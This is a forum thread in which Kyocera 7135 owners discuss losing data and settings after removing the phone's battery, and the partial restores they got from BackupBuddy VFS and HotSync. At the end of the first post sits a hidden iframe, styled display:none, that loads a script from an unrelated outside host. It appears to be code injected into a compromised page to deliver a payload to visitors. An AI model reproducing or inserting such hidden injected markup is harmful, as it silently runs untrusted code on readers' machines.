+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast

Remove Battery - Lose Everything?

I had an incident yesterday where I had to force a call to analog. In 10 minutes, my battery went from 3/4 charge to almost dead and the keypad half of the phone got very hot.

Well, I wasn't going to accept that, so I immediately called Kyocera and I believe they are going to send me a new battery.

In writing up the RMA, the technical service guy had me remove the battery (I turned off the phone first) to give him some numbers off the phone and battery. When I put the phone back and powered back on - nothing. No data, no preference settings, nothing. Screwed, right? Well at least I had backupbuddyvfs and was able to restore from that. But this did not restore everything, like banner and ringer settings, etc. Is that normal?

So - is it normal to lose everything just because you remove the battery for a couple of minutes? Shouldn't that data be in some kind of permanent memory? What's up here? And to users of BBvfs - is my restore not doing all it should?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Keep in mind that the 7135 is pretty much brand spanking new to this world. Most likely, BackupBuddy and BackupBuddyVFS have to have some sort of work, patching or updating done on them in order to fully support our new toy (which I don't have yet). Could be the reason that it's not restoring everything.
    Michael

Well my battery seems to be hanging in there today with normal life, so maybe it was an isolated thing. Maybe it was the analog thing and maybe I underestimated the charge going into that call. I don't think so, however. I'd still like to get a new one from Kyocera.

Thanks for the input, Robert. But I'd still like to know --- is it NORMAL for everything to be lost whenever the battery is removed even for a short time?

It seems like my 7135 freezes like 1x a day.. I always take my battery off. That usually resets the phone and after a min or two I am good to go.. It seems like the resets are less freqent.. Knock on wood!! BUT, twice my phone was reset to the defalt settings and that was sobering.. BUT, when I Hotsynced everything came back.. I just have to put in the passcodes for the games..

js

Originally posted by Shucks
    It seems like my 7135 freezes like 1x a day.. I always take my battery off. That usually resets the phone and after a min or two I am good to go..
    Why aren't you just doing soft resets instead of this battery stuff?
    Please visit my picture site: Robert-O-Rama :)

BTW, some of these type of batteries will do that if they are damaged due to a fall.

We use this type of technology in our packs at our laser tag arena (but bigger batteries!) and if you drop a battery from a pack and it hits hard enough, it'll melt!

With my 6035, I learned that hard way that removing the battery while the phone section was powered on could result in a hard reset. If the phone was off, it would only do a soft reset. The 7135 might behave similarly. Perhaps the phone was on when you took the battery out and lost everything.

No, the phone was off.

When removing or inserting the battery, be careful not to "bounce" it against the contacts. A couple quick bumps into the contacts will usually lock up the PDA portion. Fortunately I've been pretty happy with mine, only times I need to pull the battery is to put the spare one in when I'm on the road.

Also, analog calls will cause a quick drain on the battery which will generate heat. Same problem if you're on a long call and don't turn off the display backlight.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

When I change the battery, I go through the same procedure: turn off phone, remove battery, replace battery almost immediately. Recently I did that and it reset the phone to factory . It's only happened once.

Thanks mccut, finally someone speaking to the issue. I knew it had to be possible to retain databases and settings and programs with battery removed, otherwise what would be the point of an extra battery. I probably had my battery out for too long. Does anyone know of a time limit with battery out after which everything is ghandi?

I had a similar experience x 2. The first time I removed the battery (after powering-off the phone) in order to get the ESN for the tech support guy and the 2nd time the PDA locked-up on me and I had to do a SOFT RESET. Unfortunatley, that erased all of my data also. Fortunately, it hasn't happened to me again.

I have BB also so restoring all of my progrmas is not an issue. But, my speed dial and voice tags do no restore (even thought they are saved and appear in the BB directory). This is a huge hassle because both my speed dial and voice files are full.

I believe the reason for the loss of the speed dial and voice tags is because they are tied to the address book (I use Outlook). BB backs-up the speed dial and voice tag files BEFORE the address book so there is nothing for the file to point to. I haven't figured out how to populate the address book after a hard reset back-up BEFORE the speed dial and voice files. I contacted BB and they suggested I install the newest version (which I already had). Any suggestions!

If the order of the restore is the issue wouldn't the following work?:

Restore everything.
    Then, before doing anything else, *install* the tags files.

just a thought... mine won't be here until next week.
    -Quick

That could probably work or select ALL and then de-select the Tag files (Do you know what there names are ??) and then restore and then go back and restore just he Tag files. I have not tried it yet since I really don't feel like Hard Resetting my 7135 any time soon !!

jeh
    There is a simple way to R&R the battery and avoid even a soft reset: Be sure the unit is powered by the travel charger at the time.

> When I change the battery, I go through the same procedure:
    > turn off phone, remove battery, replace battery almost
    > immediately. Recently I did that and it reset the phone to
    > factory . It's only happened once.

And apparently more often to other folks. That really sucks - it pretty much means you can't rely on a second battery to save you if the first one runs low and you're away from power. Sure, you can swap the battery, but the result might be a dead phone anyway.

(On the 6035 I have a second battery, but I never actually got far enough into its capacity to need to swap it in the field!)

changed battery -- caused sudden hard reset

I turned the phone off, popped out the old battery, inserted the new one quickly. The phone came back with the Palm reset screen sequence (where you tap here and there to calibrate, set date and time, etc.) and everything was gone.

The weird part was my memory card was a bit screwed up. Couldn't locate files there and the BackupBuddy VFS restore utility was nowhere to be found.

I got back to my hotel (these things always happen when most inconvenient) and restored using IR from my laptop. Took a while and some things (speed dial settings for example) didn't restore.

Anyone else had this problem? Do you know the cause? I've changed batteries numerous times before but now I am afeared of the same thing happening again...

What the?????

So, if I take the battery off, do I lose all my info? I had to take off my batt. today, (maybe 30 sec.) and all my info was gone! I have Backup Buddy VFS and restored most of my data (I hadn't backed up for a few days) anyway, I came home and Hotsyncd, only to find my 3rd party apps were not reinstalled! Is this normal? What did I do wrong?
    Confused.

Dude, I feel your pain! Same thing happend to me today! I posted about it as well. I was able to reinstall from BB VFS, but all of my settings were gone! I'm wondering if this is normal.

You shouldn't have lost anything...

Yeah, that's what you would think, but.....